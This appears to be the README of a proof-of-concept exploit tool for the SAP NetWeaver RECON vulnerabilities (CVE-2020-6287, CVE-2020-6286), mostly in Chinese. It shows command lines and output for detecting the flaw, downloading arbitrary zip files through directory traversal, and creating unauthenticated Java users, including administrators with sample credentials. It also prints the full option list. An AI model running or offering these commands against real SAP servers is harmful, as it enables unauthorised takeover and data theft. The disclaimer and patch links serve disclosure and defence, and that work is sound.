
PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)
CVE-2020-6287、CVE-2020-6286 的 PoC(SAP RECON 漏洞)
Pffff!RECON(远程可利用 NetWeaver 代码)?伙计们,真的吗?这就是你们想出的最佳代号?:)
此脚本用于检测 SAP LM Configuration Wizard 缺少授权检查的漏洞,并作为 PoC 脚本利用 queryProtocol 方法中的目录遍历。
目录遍历允许从 SAP 服务器下载任意 zip 文件。
本项目仅用于教育目的,不能用于违法或个人牟利。
项目作者不对因本项目材料造成的任何可能损害负责。
原始发现:
CVE-2020-6287:Pablo Artuso
CVE-2020-6286:Yvan 'iggy' G.
只需指定 SAP NW AS Java 主机名/IP。
还有额外选项:
-c - 检查 SAP 服务器是否存在 RECON 漏洞-f - 从 SAP 服务器下载 zip 文件-u - 创建具有 认证用户 角色的 SAP JAVA 用户-a - 创建具有 管理员 角色的 SAP JAVA 用户例如:下载 zip 文件
~python RECON.py -H 172.16.30.8 -f /1111.zip
Check1 - 存在漏洞! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
OK!文件 zipfile_929.zip 已保存
例如:创建 SAP JAVA 用户
~python RECON.py -H 172.16.30.8 -u
Check1 - 存在漏洞! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
即将创建新用户。sapRpoc5484:Secure!PwD9379
OK!用户已创建
例如:创建 SAP JAVA 管理员用户
~python RECON.py -H 172.16.30.8 -a
Check1 - 存在漏洞! [CVE-2020-6287] (RECON) - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
即将创建用户 sapRpoc5574:Secure!PwD7715,角色为 '管理员'
OK!管理员用户已创建
~python RECON.py -h
usage: RECON.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-f ZIPFILE]
[-u] [-a] [--timeout TIMEOUT] [-v]
PoC for CVE-2020-6287, (RECON)
此脚本用于检测 SAP LM Configuration Wizard 缺少授权检查的漏洞,并利用 queryProtocol 方法中的目录遍历进行攻击
原始发现:
- Pablo Artuso. https://twitter.com/lmkalg
- Yvan 'iggy' G https://twitter.com/_1ggy
致谢:
- Spencer McIntyre https://twitter.com/zeroSteiner
解决方案:https://launchpad.support.sap.com/#/notes/2934135, https://launchpad.support.sap.com/#/notes/2939665
optional arguments:
-h, --help 显示此帮助信息并退出
-H HOST, --host HOST Java NW 主机地址(默认:127.0.0.1)
-P PORT, --port PORT Java NW Web 端口(默认:tcp/50000)
-p PROXY, --proxy PROXY
使用代理(例如:127.0.0.1:8080)
-s, --ssl 启用 SSL
-c, --check 仅检测漏洞
-f ZIPFILE, --zipfile ZIPFILE
要读取的 ZIP 文件。CVE-2020-6286
-u, --user 创建简单 JAVA 用户。CVE-2020-6287
-a, --admin 创建具有“管理员”角色的 JAVA 用户。CVE-2020-6287
--timeout TIMEOUT HTTP 连接超时时间(秒,默认:10)
-v, --verbose 详细模式